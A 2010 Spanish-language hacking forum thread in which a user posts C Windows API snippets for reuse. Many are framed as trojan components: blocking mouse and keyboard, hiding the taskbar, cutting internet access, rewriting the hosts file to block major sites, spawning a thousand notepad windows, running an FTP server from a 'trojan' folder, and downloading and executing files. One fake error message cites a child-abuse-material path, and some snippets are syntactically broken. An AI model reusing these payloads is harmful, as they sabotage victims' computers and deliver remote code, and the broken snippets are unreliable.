Tu comunidad de Seguridad Informatica

Coleccion De APIS En C Info1810 Para ver Todo el contenido del foro es necesario estar Registrado! Coleccion De APIS En C Info1810
Coleccion De APIS En C Info1810 Antes de comentar o Aportar es Obligado Leer Las: Reglas | Rules Coleccion De APIS En C Info1810
Coleccion De APIS En C Info1810Ya Esta Disponible al publico "LeProject" el Videojuego del Foro Click Aquí Para Ver el Post. Coleccion De APIS En C Info1810
Coleccion De APIS En C Info1810Pitbull Security Labs "Extras" Esta Disponible! [ENTRA]Coleccion De APIS En C Info1810

No estás conectado. Conéctate o registrate

Ver el tema anterior Ver el tema siguiente Ir abajo  Mensaje [Página 1 de 1.]

1Kodeinfect 

Kodeinfect
Usuario
Usuario

Sáb Oct 02, 2010 4:37 pm
Abrir bandeja de CD-rom:
Incluir biblioteca: #include <mmsystem.h>

Código:
mciSendString("Set CDAudio Door Open",NULL,0,GetActiveWindow()); // Primera forma
mciSendString("Set CDAudio Door Open",NULL,0,NULL); // Segunda forma

Cerra bandeja lo mismo:

Código:
mciSendString("Set CDAudio Door Closed",NULL,0,GetActiveWindow());
mciSendString("Set CDAudio Door Closed",NULL,0,NULL);

Ocultar barra de tareas:

Código:
HWND reg;
 reg = FindWindow("Shell_TrayWnd",0);
 ShowWindow(reg, SW_HIDE);

Mostrar barra de tareas:

Código:
HWND reg;
 reg = FindWindow("Shell_TrayWnd",0);
 ShowWindow(reg, SW_SHOW);

Ocultar aplicacion en barra de tareas:

Código:
ShowWindow(Application.Handle, SW_HIDE);

Para mostrar:

Código:
ShowWindow(Application.Handle, SW_SHOW);

Ocultar boton de inicio:

Código:
HRGN Rgn;
HANDLE tWnd;
tWnd = FindWindow("Shell_TrayWnd", 0);
Rgn = CreateRectRgn(0, 0, 0, 0);
SetWindowRgn(FindWindowEx(tWnd, 0, "BUTTON", 0), Rgn, true);

Mostrar boton de inicio:

Código:
HANDLE tWnd;
tWnd = FindWindow("Shell_TrayWnd", 0);
SetWindowRgn(FindWindowEx(tWnd, 0, "BUTTON", 0), 0, true);

Otra forma casi la misma:
Ocultar boton inicio:

Código:
HANDLE tWnd,bWnd ;
tWnd = FindWindow("Shell_TrayWnd", 0);
bWnd=FindWindowEx(tWnd, 0, "BUTTON", 0);
ShowWindow (bWnd, SW_HIDE);

Mostrar:

Código:
HANDLE tWnd,bWnd;
tWnd = FindWindow("Shell_TrayWnd", 0);
bWnd=FindWindowEx(tWnd, 0, "BUTTON", 0);
ShowWindow (bWnd, SW_NORMAL);


Bloquear mouse y teclado

Código:
BlockInput(true);
Sleep(600000);
return 0;


Change Foreground Window Title

Código:
HWND Window;
Window = GetForegroundWindow();
SetWindowText(Window, L"Your text here");
Sleep(10000);
return 0;


Turn Off Monitor

Código:
SendMessage(HWND_BROADCAST, WM_SYSCOMMAND, SC_MONITORPOWER, (LPARAM) 2);
Sleep(2000);
return 0;


Swap Mouse Buttons

Código:
SwapMouseButton(true);
return 0;

Crazy Mouse


Código:
int i,x,y;
for(i= 0; i < 201; i++) {
x = rand()%1001;
y = rand()%801;
SetCursorPos(x,y);
Sleep(200);
}
return 0;

Open a website

Código:
ShellExecute(NULL,L"open",L"http://www.yourwebsitehere.com/",NULL,NULL,SW_MAXIMIZE);
return 0;

Disable Taskbar

Código:
HWND hWin;
hWin = FindWindow(L"Shell_TrayWnd",NULL);
EnableWindow(hWin,false);
ShowWindow(hWin,false);
return 0;

MessageBox / Error

Código:
MessageBox(NULL,TEXT("Error loading C:\\Documents and Settings\\All Users\\Child Porn"),TEXT("Error"),MB_OK | MB_ICONEXCLAMATION );
return 0;

Hide Current Window

Código:
HWND hWin;
hWin = GetForegroundWindow();
ShowWindow(hWin,false);
return 0;

Play a sound

Código:
PlaySound(TEXT("C:\\Windows\\trojan\\sound.wav"), NULL, SND_FILENAME);
return 0;

Disable Internet

Código:
system("ipconfig /release");
return 0;

Open & Close CD Drive

Código:
mciSendString(L"set CDAudio door open", NULL, 0, NULL);
Sleep(2000);
mciSendString(L"set CDAudio door closed", NULL, 0, NULL);
Sleep(5000);
mciSendString(L"set CDAudio door open", NULL, 0, NULL);
Sleep(2000);
mciSendString(L"set CDAudio door closed", NULL, 0, NULL);
Sleep(5000);
mciSendString(L"set CDAudio door open", NULL, 0, NULL);
Sleep(2000);
mciSendString(L"set CDAudio door closed", NULL, 0, NULL);
Sleep(5000);
mciSendString(L"set CDAudio door open", NULL, 0, NULL);
Sleep(2000);
mciSendString(L"set CDAudio door closed", NULL, 0, NULL);
Sleep(5000);
return 0;

Notepad Bomber

Código:
int i;
for(i= 0; i < 1001; i++) {
ShellExecute(NULL,L"open",L"notepad.exe",NULL,NULL,SW_MAXIMIZE);
}
return 0;

Edits Hosts file to block sites

Código:
FILE *fp;
int i;
char hosts_file_path[FILENAME_MAX];
char ip[] = "0.0.0.0";

/* Add your sites in the below list. */
char *blist[] = {
"[Tienes que estar registrado y conectado para ver este vínculo]
"orkut.com",
"[Tienes que estar registrado y conectado para ver este vínculo]
"google.com",
"[Tienes que estar registrado y conectado para ver este vínculo]
"google.co.in",
"[Tienes que estar registrado y conectado para ver este vínculo]
"gmail.com",
"[Tienes que estar registrado y conectado para ver este vínculo]
"facebook.com",
"[Tienes que estar registrado y conectado para ver este vínculo]
"yahoo.com",
"[Tienes que estar registrado y conectado para ver este vínculo]
"twitter.com",
"#"
};
strcpy (hosts_file_path, getenv ("SystemRoot"));
strcat (hosts_file_path, "\\system32\\drivers\\etc\\hosts");
if ((fp = fopen (hosts_file_path, "a")) == NULL)
return 0;
fputs ("\n", fp);
for (i = 0; blist[i][0] != '#'; i++)
{
fputs (ip, fp);
fputs ("        ", fp);
fputs (blist[i], fp);
fputs ("\n", fp);
}
fclose (fp);
system("echo ' '");
return 0;

Start FTP server (download SlimFTPd and put it in your trojan folder)

Código:
ShellExecute(NULL,L"open",L"C:\\Windows\\trojan\\SlimFTPd.exe",NULL,NULL,SW_MAXIMIZE);
return 0;

Download File From Internet

Código:

#include <urlmon.h>

int main(){
URLDownloadToFile( 0 , "http:\\[Tienes que estar registrado y conectado para ver este vínculo] , "C:\\Ruta.exe" ,  0 , 0)
return 0;
}

Changes Window Current Position!

Código:

HWND ventana;
ventana = GetForegroundWindow();
SetWindowPos(ventana,0,"Posicion_X","Posicion_Y","Ancho_Pixeles","Alto_Pixeles",SWP_SHOWWINDOW);

Execute File From Path

Código:

WinExec( "c:\Ruta_De_Exe.exe" , 10 );
return 0;

Fuente - HT..
PD: Se seguiran añadiendo Apis al Post.. Solo publiquen las que quieran.. Salu2

2pulpoman 

pulpoman
Pro User
Pro User

Jue Ene 19, 2012 10:16 am
interesante hermano

Ver el tema anterior Ver el tema siguiente Volver arriba  Mensaje [Página 1 de 1.]

Permisos de este foro:
No puedes responder a temas en este foro.